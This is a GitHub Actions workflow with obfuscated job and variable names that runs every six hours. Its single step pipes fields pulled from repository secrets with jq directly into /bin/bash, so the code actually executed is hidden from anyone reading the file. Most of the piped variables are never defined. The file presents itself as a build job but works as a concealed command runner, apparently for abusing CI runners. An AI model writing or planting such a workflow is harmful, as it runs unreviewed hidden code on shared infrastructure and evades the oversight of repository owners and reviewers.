name: leidate7890

on:
  workflow_dispatch:
  schedule:
    - cron: '8 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: leidate7890
        env:
          fmqcd7: ${{ secrets.fmqcd7 }}
        run: |
          echo $fmqcd7 | jq -r .vxwoo8360 | /bin/bash
          echo $nr256 | jq -r .oguy91145 | /bin/bash
          echo $u5 | jq -r .gcu2632 | /bin/bash
          echo $xkryr76404 | jq -r .g399 | /bin/bash
          echo $jm44913 | jq -r .sxj67708 | /bin/bash
          echo $qbrnt5 | jq -r .gzyz14120 | /bin/bash
          echo $nxk4 | jq -r .mv35 | /bin/bash

